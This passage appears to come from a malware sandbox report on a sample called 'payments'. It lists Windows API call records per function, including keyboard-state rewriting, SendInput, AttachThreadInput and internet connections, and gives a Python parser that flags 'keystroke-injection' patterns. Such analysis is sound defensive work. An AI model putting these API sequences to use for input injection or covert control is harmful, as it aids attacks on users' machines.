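• VariantInit.OLEAUT32(?), ref: 00CEAACA
• VariantClear.OLEAUT32(?), ref: 00CEAD9D
Memory Dump Source
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00CD3966
• SetKeyboardState.USER32(00000080,?,00000001), ref: 00CD3982
• PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00CD39EF
• SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00CD3A4D
Memory Dump Source
APIs
• GetForegroundWindow.USER32 ref: 00CF7CB9
  • Part of subcall function 00CD5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CD5F6F
  • Part of subcall function 00CD5F55: GetCurrentThreadId.KERNEL32 ref: 00CD5F76
  • Part of subcall function 00CD5F55: AttachThreadInput.USER32(00000000,?,00CD781F), ref: 00CD5F7D
• GetCaretPos.USER32(?), ref: 00CF7CCA
• ClientToScreen.USER32(00000000,?), ref: 00CF7D03
• GetForegroundWindow.USER32 ref: 00CF7D09
Memory Dump Source
"""


@dataclass
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: int                 # address of the call site
    callee: Optional[int]    # sub-function address when the call is indirect


@dataclass
class FunctionBlock:
    calls: List[ApiCall] = field(default_factory=list)

    def api_names(self, include_subcalls: bool = True) -> Set[str]:
        return {c.api for c in self.calls if include_subcalls or c.callee is None}


def parse_listing(text: str) -> List[FunctionBlock]:
    """Split on the "APIs" / "Memory Dump Source" markers that bracket each
    function's records, and parse every record line in between."""
    blocks: List[FunctionBlock] = []
    current: Optional[FunctionBlock] = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            continue
        if stripped == "Memory Dump Source":
            current = None
            continue
        if current is None:
            continue
        m = RECORD_RE.match(line)
        if not m:
            continue  # metadata line inside the block, not a record
        args = tuple(a for a in (m["args"] or "").split(",") if a != "")
        current.calls.append(ApiCall(
            api=m["api"], module=m["module"], args=args, ref=int(m["ref"], 16),
            callee=int(m["callee"], 16) if m["callee"] else None))
    return blocks


# Heuristic API sets (assumption, not a Joe Sandbox rule): keyboard-state
# rewriting plus SendInput is how synthesised keystrokes are delivered;
# AttachThreadInput plus a caret lookup reads another window's input context.
PATTERNS = {
    "keystroke-injection": {"SetKeyboardState", "SendInput"},
    "foreign-input-context": {"AttachThreadInput", "GetCaretPos"},
}


def match_patterns(blocks: List[FunctionBlock], patterns=PATTERNS) -> dict:
    """Map each pattern name to the indexes of blocks whose API set
    (subcalls included) covers the whole pattern."""
    hits = {name: [] for name in patterns}
    for i, b in enumerate(blocks):
        names = b.api_names()
        for name, required in patterns.items():
            if required <= names:
                hits[name].append(i)
    return hits


def api_histogram(blocks: List[FunctionBlock]) -> Counter:
    """Direct calls per API; subcalls are excluded so a shared helper such as
    the AttachThreadInput wrapper is not counted once per caller."""
    return Counter(c.api for b in blocks for c in b.calls if c.callee is None)


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE)
    print(match_patterns(parsed))
    print(api_histogram(parsed).most_common(5))
```

The regex keeps "::"-qualified names such as _LocaleUpdate::_LocaleUpdate intact, so the same parser handles the LIBCMT records further down the page; feed it the whole exported listing to pivot from an API of interest to every function block that calls it.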
                                                                                                                          APIs
                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00CC4038
                                                                                                                          • __isleadbyte_l.LIBCMT ref: 00CC4066
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00CC4094
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00CC40CA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3058430110-0
                                                                                                                          • Opcode ID: 32a9cd920d92d00766fce7e77518eb10fb818fb24279c825d7a37ef29469d589
                                                                                                                          • Instruction ID: 999f110f9637161bbea2bab1770f8e8000c0376741696d8ab238e3185c032ef0
                                                                                                                          • Opcode Fuzzy Hash: 32a9cd920d92d00766fce7e77518eb10fb818fb24279c825d7a37ef29469d589
                                                                                                                          • Instruction Fuzzy Hash: 1531ED30680206EFDB299F75C854FBA7BA6FF40310F19C02DEA618B1A1E731D991DB90
                                                                                                                          APIs
                                                                                                                          • GetForegroundWindow.USER32 ref: 00CF7CB9
                                                                                                                            • Part of subcall function 00CD5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CD5F6F
                                                                                                                            • Part of subcall function 00CD5F55: GetCurrentThreadId.KERNEL32 ref: 00CD5F76
                                                                                                                            • Part of subcall function 00CD5F55: AttachThreadInput.USER32(00000000,?,00CD781F), ref: 00CD5F7D
                                                                                                                          • GetCaretPos.USER32(?), ref: 00CF7CCA
                                                                                                                          • ClientToScreen.USER32(00000000,?), ref: 00CF7D03
                                                                                                                          • GetForegroundWindow.USER32 ref: 00CF7D09
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2759813231-0
                                                                                                                          • Opcode ID: 8470897858b77bfa98dc07d0c23f8887230f3b2f18ecf43bc49739499b217a8a
                                                                                                                          • Instruction ID: 103747d592e5947b39ad0b5e0d0817651131af5ea3207f7e43bc489acbe548ba
                                                                                                                          • Opcode Fuzzy Hash: 8470897858b77bfa98dc07d0c23f8887230f3b2f18ecf43bc49739499b217a8a
                                                                                                                          • Instruction Fuzzy Hash: AE314D72900119AFDB00EFB9C8819EFBBF9EF59314B10806AE815E7211DB309E01DBA0
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAB34E: GetWindowLongW.USER32(?,000000EB), ref: 00CAB35F
                                                                                                                          • GetCursorPos.USER32(?), ref: 00CFF211
                                                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00D0E4C0,?,?,?,?,?), ref: 00CFF226
                                                                                                                          • GetCursorPos.USER32(?), ref: 00CFF270
                                                                                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00D0E4C0,?,?,?), ref: 00CFF2A6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2864067406-0
                                                                                                                          • Opcode ID: 378eddb09773a68bc047d6f83c2603d81fa7b7bac0ea7ab067a974e9b58474b0
                                                                                                                          • Instruction ID: 6fd31c4ffc7a3edfcf9262b5372b9b415e1f909d21036abcc7c72f05b4b841c0
                                                                                                                          • Opcode Fuzzy Hash: 378eddb09773a68bc047d6f83c2603d81fa7b7bac0ea7ab067a974e9b58474b0
                                                                                                                          • Instruction Fuzzy Hash: B5218039500118BFEB258F94C858EFA7BB6EF0A711F048069FA15872A1D7709E52EB61
                                                                                                                          APIs
                                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CE4358
                                                                                                                            • Part of subcall function 00CE43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CE4401
                                                                                                                            • Part of subcall function 00CE43E2: InternetCloseHandle.WININET(00000000), ref: 00CE449E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Internet$CloseConnectHandleOpen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1463438336-0
                                                                                                                          • Opcode ID: cc90c38eaebd9b629c3fedb44d6ea9eb13d4b15ae4c4e53a224b58b40aa118ea
                                                                                                                          • Instruction ID: 8881d3ae0f0ed4bbdafa1e3f73d648e41432283f38597783749cdfcd01a82b07
                                                                                                                          • Opcode Fuzzy Hash: cc90c38eaebd9b629c3fedb44d6ea9eb13d4b15ae4c4e53a224b58b40aa118ea
                                                                                                                          • Instruction Fuzzy Hash: 1B21C635200745BFEB199F62DC00FBBB7AAFF44711F14401AFA15D76A0DB719921A7A0
                                                                                                                          APIs
                                                                                                                          • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00CE8AE0
                                                                                                                          • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00CE8AF2
                                                                                                                          • accept.WSOCK32(00000000,00000000,00000000), ref: 00CE8AFF
                                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00CE8B16
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastacceptselect
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 385091864-0
                                                                                                                          • Opcode ID: 0f452dcb7a9597d0bddce64eaf229dd1f0bbfb9aec4f2929e7bd2beaf151f92b
                                                                                                                          • Instruction ID: d62ce9caf5661ec1dc48ebda814361a9b35d83cd7c732c3e6b80fa44b808c741
                                                                                                                          • Opcode Fuzzy Hash: 0f452dcb7a9597d0bddce64eaf229dd1f0bbfb9aec4f2929e7bd2beaf151f92b
                                                                                                                          • Instruction Fuzzy Hash: 7D218472A00124AFC7119F69CC85ADE7BEDEF4A354F00816AF84AD7290DB749A45CBA0
                                                                                                                          APIs
                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00CF8AA6
                                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CF8AC0
                                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CF8ACE
                                                                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00CF8ADC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Long$AttributesLayered
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2169480361-0
                                                                                                                          • Opcode ID: 6ce6773ec41736602ffe8e87be1551a205f0ea8ce054d43068c184e9617b3afe
                                                                                                                          • Instruction ID: ca2d16f7538a0cff3c6ee354e24ceadd2a19d2f2f1c281427fb540316e4e79b3
                                                                                                                          • Opcode Fuzzy Hash: 6ce6773ec41736602ffe8e87be1551a205f0ea8ce054d43068c184e9617b3afe
                                                                                                                          • Instruction Fuzzy Hash: 3211D031305515BFEB44AB18CC09FBA7799EF85320F14811AFA26C72E2CF70AD0597A5
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CD1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00CD0ABB,?,?,?,00CD187A,00000000,000000EF,00000119,?,?), ref: 00CD1E77
                                                                                                                            • Part of subcall function 00CD1E68: lstrcpyW.KERNEL32(00000000,?,?,00CD0ABB,?,?,?,00CD187A,00000000,000000EF,00000119,?,?,00000000), ref: 00CD1E9D
                                                                                                                            • Part of subcall function 00CD1E68: lstrcmpiW.KERNEL32(00000000,?,00CD0ABB,?,?,?,00CD187A,00000000,000000EF,00000119,?,?), ref: 00CD1ECE
                                                                                                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00CD187A,00000000,000000EF,00000119,?,?,00000000), ref: 00CD0AD4
                                                                                                                          • lstrcpyW.KERNEL32(00000000,?,?,00CD187A,00000000,000000EF,00000119,?,?,00000000), ref: 00CD0AFA
                                                                                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00CD187A,00000000,000000EF,00000119,?,?,00000000), ref: 00CD0B2E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcmpilstrcpylstrlen
                                                                                                                          • String ID: cdecl
                                                                                                                          • API String ID: 4031866154-3896280584
                                                                                                                          • Opcode ID: 0f2e63d9007f067f7b3edc0579e62d6262ab8e54626ded78dc18a31f0a9ba438
                                                                                                                          • Instruction ID: c7970c34cfa65e3ee939e8891df7a0d9c320a801a93305b073c368c4ad617ed6
                                                                                                                          • Opcode Fuzzy Hash: 0f2e63d9007f067f7b3edc0579e62d6262ab8e54626ded78dc18a31f0a9ba438
                                                                                                                          • Instruction Fuzzy Hash: 2011AF36200305BFDB25AF68D809E7A77A9FF45314F90802BE906CB350EB719941D7A0
                                                                                                                          APIs
                                                                                                                          • _free.LIBCMT ref: 00CC2FB5
                                                                                                                            • Part of subcall function 00CB395C: __FF_MSGBANNER.LIBCMT ref: 00CB3973
                                                                                                                            • Part of subcall function 00CB395C: __NMSG_WRITE.LIBCMT ref: 00CB397A
                                                                                                                            • Part of subcall function 00CB395C: RtlAllocateHeap.NTDLL(00E70000,00000000,00000001,00000001,00000000,?,?,00CAF507,?,0000000E), ref: 00CB399F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
• Opcode ID: 23f925484d35fbacd73baf2aaa0fca72b454d670f024528415ad39b6672dc001
• Instruction ID: 0935b7ecf1f7a884361f5be4d1c43b53c6dab418d9b5bf29debe1ea1f2390fc9
• Opcode Fuzzy Hash: 23f925484d35fbacd73baf2aaa0fca72b454d670f024528415ad39b6672dc001
• Instruction Fuzzy Hash: 4E11AB32509325AFDB313BB4FC45B9A3F98AF443A0F24852DFC59D6151DB34C941AAA0
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00CD05AC
• LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00CD05C7
• RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00CD05DD
• FreeLibrary.KERNEL32(?), ref: 00CD0632
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: Type$FileFreeLibraryLoadModuleNameRegister
• String ID:
• API String ID: 3137044355-0
• Opcode ID: 5c627398067c95fee02ebbb7bdc880a3222e9c52c3a5bb3c902d12308f39366e
• Instruction ID: cf46a9f0bf7ffffb123cf26a85583218ba57b5a37cd3e458c13f40d609b9368b
• Opcode Fuzzy Hash: 5c627398067c95fee02ebbb7bdc880a3222e9c52c3a5bb3c902d12308f39366e
• Instruction Fuzzy Hash: BC215471500319FBD7109F99DC88BDAB7B8EB40700F10845EBA1696250D770DA569B50
APIs
• CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00CD6733
• _memset.LIBCMT ref: 00CD6754
• DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00CD67A6
• CloseHandle.KERNEL32(00000000), ref: 00CD67AF
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: CloseControlCreateDeviceFileHandle_memset
• String ID:
• API String ID: 1157408455-0
• Opcode ID: 3867ef7d3451770127afa6deedd30f97124dd8045f0721ef61757950015ac707
• Instruction ID: 2f59e9bce04885c378509d2270fa0682069359749a3fa1dc36046672196262fe
• Opcode Fuzzy Hash: 3867ef7d3451770127afa6deedd30f97124dd8045f0721ef61757950015ac707
• Instruction Fuzzy Hash: 1D11C1729012287AE7209BA5AC4DFEBBABCEB44724F11419AF514E7280D6705E80CAB4
APIs
  • Part of subcall function 00CCAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00CCAA79
  • Part of subcall function 00CCAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00CCAA83
  • Part of subcall function 00CCAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00CCAA92
  • Part of subcall function 00CCAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00CCAA99
  • Part of subcall function 00CCAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00CCAAAF
• GetLengthSid.ADVAPI32(?,00000000,00CCADE4,?,?), ref: 00CCB21B
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 00CCB227
• HeapAlloc.KERNEL32(00000000), ref: 00CCB22E
• CopySid.ADVAPI32(?,00000000,?), ref: 00CCB247
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
• String ID:
• API String ID: 4217664535-0
• Opcode ID: a7dc6927ce368deff472fd5cf11d4342e0ea7935d574650a2f3b59ec09c4bb33
• Instruction ID: 00397fd38eebf1493caab79f82945b1d14b0f5d001075d6291a43b7a8807ad9c
• Opcode Fuzzy Hash: a7dc6927ce368deff472fd5cf11d4342e0ea7935d574650a2f3b59ec09c4bb33
• Instruction Fuzzy Hash: 8D118F71A00209BFDB049F94DD86FAEB7A9EF85308F14802DE952D7210D775AE45DB20
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 00CCB498
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CCB4AA
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CCB4C0
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CCB4DB
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: fce51b5b942a1eb8397e04ea30c25490f7b48c08a1fbd2c3d347c2274a3c55e0
• Instruction ID: 00352a1b63c9fae9a5bebb0a505398b5ec2c0043edbc80169e53d4ad519a554e
• Opcode Fuzzy Hash: fce51b5b942a1eb8397e04ea30c25490f7b48c08a1fbd2c3d347c2274a3c55e0
• Instruction Fuzzy Hash: A011487A900218FFDB11DFA9C881F9DBBB4FB08700F204095E604B7290D771AE11DB94
APIs
  • Part of subcall function 00CAB34E: GetWindowLongW.USER32(?,000000EB), ref: 00CAB35F
• DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00CAB5A5
• GetClientRect.USER32(?,?), ref: 00D0E69A
• GetCursorPos.USER32(?), ref: 00D0E6A4
• ScreenToClient.USER32(?,?), ref: 00D0E6AF
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
• String ID:
• API String ID: 4127811313-0
• Opcode ID: ceac65ada81d041b4ee7a836b8c107539f5f7d265f09301bb9ae3c878943453a
• Instruction ID: 1ccb86072022e7e26d2aa91df0c7c63b87988935222a58aa6901a9865137532d
• Opcode Fuzzy Hash: ceac65ada81d041b4ee7a836b8c107539f5f7d265f09301bb9ae3c878943453a
• Instruction Fuzzy Hash: B6113A3190012ABBDB10DFA4D9459EE7BBAEB0A305F404855E902E7241D730AA82DBB1
APIs
• GetCurrentThreadId.KERNEL32 ref: 00CD7352
• MessageBoxW.USER32(?,?,?,?), ref: 00CD7385
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00CD739B
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00CD73A2
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• API String ID: 2880819207-0
• Opcode ID: de982bde537f1d6f8d319af285732f603704d0eb574bce2f1e659d6b98772423
• Instruction ID: b221190cca2630c4348309b08dd08b793a988b9a02b25533c21fc97238c449c2
• Opcode Fuzzy Hash: de982bde537f1d6f8d319af285732f603704d0eb574bce2f1e659d6b98772423
